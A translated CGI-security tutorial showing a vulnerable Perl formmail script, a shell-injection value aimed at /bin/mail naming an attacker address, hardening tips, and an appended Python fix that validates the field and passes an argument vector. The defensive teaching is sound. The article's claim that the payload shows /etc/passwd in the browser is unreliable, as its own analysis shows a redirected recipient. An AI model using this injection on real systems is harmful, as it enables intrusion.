Writing CGI Programs with Delphi (5)
CGI programs are powerful, but for exactly that reason a careless CGI developer or system administrator can leave a system full of holes. This article discusses CGI security.

3. CGI security

A CGI program is powerful: it has all the capabilities of an ordinary program, and it can be invoked from the web. Because of that power, carelessness on the part of the CGI developer or the system administrator can riddle the system with holes for outsiders to exploit. The security problems discussed here are not caused by the CGI specification itself; they come from programming and system configuration that fail to take security into account. The CGI specification lets a remote user draw on the server's computing power, and using that power in itself does not compromise the security of the system.

Here is a CGI security hole that is quite common on UNIX systems:

    #!/usr/local/bin/perl
    # formmail.cgi
    require "cgi.pl";
    # fill %input from the submitted form; this assumes cgi.pl provides
    # ReadParse in the style of cgi-lib.pl (the original omitted this call)
    &ReadParse(*input);

    # launch the e-mail program /bin/mail, taking the Subject: header
    # from the "formname" field of the form
    open(MAIL, "|/bin/mail -s '" . $input{"formname"} . "' WebWeave");

    # send the "formcontents" field as the body of the message
    print MAIL $input{"formcontents"};
    close(MAIL);
    exit(0);

In this example the CGI program hands the submitted form data to /bin/mail and mails it to the WebWeave account on the server. In most cases the program does its job normally, but it does not filter the information entered into the web form at all, and that leaves a serious hidden danger: when a user, by mistake or with ill intent, enters malformed data, the result can be a system error, or the user can do things he has no permission to do.

For example, if the user enters the following in the "formname" field of the form:

    ls /etc/passwd' cracker@illegal.org #

the contents of /etc/passwd are displayed in the user's web browser. If that Unix system's passwd file still holds the password hashes, Crack Jack or Crack John can then be used to try to crack the passwords!

As said above, responsibility for CGI security rests with both programmers and system administrators. The points each should pay attention to are listed separately below.

The system administrator's job:

1. Work with programmers, share information about server security, and review code promptly.
2. Use good server software, and regularly visit the server software's web site for the latest information.
3. Restrict users to specific network hosts; use the server's security management features, set up routing access control, and so on.
4. Limit CGI functionality: restrict some advanced services to trusted users, limit CGI programs under test to their developers, and make only tested CGI programs available to users.
5. When using someone else's CGI program, examine the code carefully.
6. Confine CGI programs to a protected environment: run the server as an unprivileged user and set up a dedicated account or group for running CGI programs.
7. Place the server that runs CGI programs outside the firewall. Note this carefully: the CGI server must sit outside the firewall, because if it is placed inside and an unauthorized user finds a security hole in it, he can then control every host inside the firewall!
8. Lower the priority of CGI programs, so that an unauthorized user cannot run a large number of CGI programs and overload the server.
9. Subscribe to mailing lists on network security and take part in the network security newsgroups.

The CGI programmer's job:

1. Like the system administrator, share security information and review code.
2. Use reliable library programs, and check the library programs' source code.
3. Obtain the client's host name from REMOTE_HOST and restrict some advanced functionality to trusted hosts.
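The weakness in the formmail.cgi example above is that the unfiltered "formname" field is spliced into a command string that a shell parses. The following is an added illustration, not part of the original article (the article's script is Perl; the same construction is re-expressed here in Python so that the fix is explicit): it shows how a POSIX shell would split the vulnerable command string, and the hardened equivalent, which validates the field against an allow-list and passes /bin/mail an argument vector so no shell is ever involved. The function names, the regular expression and the benign sample input are this example's own; the injected field value is the one quoted in the article.

```python
import re
import shlex
import subprocess
from typing import List

# Constructed sample inputs for this example (not taken from any real request).
BENIGN_SUBJECT = "Feedback on the download page"
INJECTED_SUBJECT = "ls /etc/passwd' cracker@illegal.org #"  # the field value quoted in the article
MAIL_TO = "WebWeave"                                        # the recipient used by the article's script

# Allow-list for a mail subject: letters, digits, space and a few punctuation
# marks, 1 to 80 characters. Quotes, '#', '|', ';', '/', '@' are not admitted.
SUBJECT_RE = re.compile(r"[A-Za-z0-9 ,.!?()_-]{1,80}")


def subject_is_valid(subject: str) -> bool:
    """True only if the whole field matches the allow-list."""
    return SUBJECT_RE.fullmatch(subject) is not None


def vulnerable_command(subject: str, to: str) -> str:
    """The article's construction: the field is spliced into a string that sh will parse."""
    return "/bin/mail -s '" + subject + "' " + to


def shell_parse(command: str) -> List[str]:
    """Split a command the way a POSIX shell would (quotes honoured, '#' starts a comment).

    The last word is the recipient that /bin/mail would actually receive, so comparing
    it with the intended recipient shows what the injected quote and '#' do.
    """
    return shlex.split(command, comments=True, posix=True)


def hardened_argv(subject: str, to: str) -> List[str]:
    """Reject anything outside the allow-list, then build an argument vector.

    Each element reaches /bin/mail as exactly one argv entry; the shell never sees it.
    """
    if not subject_is_valid(subject):
        raise ValueError("form field rejected: characters outside the allowed set")
    return ["/bin/mail", "-s", subject, to]


def send_form_mail(subject: str, to: str, body: str) -> None:
    """Hardened equivalent of the article's open/print/close: no shell string anywhere."""
    subprocess.run(hardened_argv(subject, to), input=body.encode(), check=True)


if __name__ == "__main__":
    for field in (BENIGN_SUBJECT, INJECTED_SUBJECT):
        words = shell_parse(vulnerable_command(field, MAIL_TO))
        print("shell would deliver to:", words[-1])
        try:
            print("hardened argv:", hardened_argv(field, MAIL_TO))
        except ValueError as exc:
            print("hardened:", exc)
```

Run stand-alone, the script shows that for the benign field the shell delivers to WebWeave, while for the article's field the closing quote and the trailing `#` make the shell deliver to the address supplied in the form instead. The hardened path never reaches that point: the field fails the allow-list and is rejected before any process is started, and a field that passes is handed over as a single argv element, so even a quote inside it would be plain data to /bin/mail.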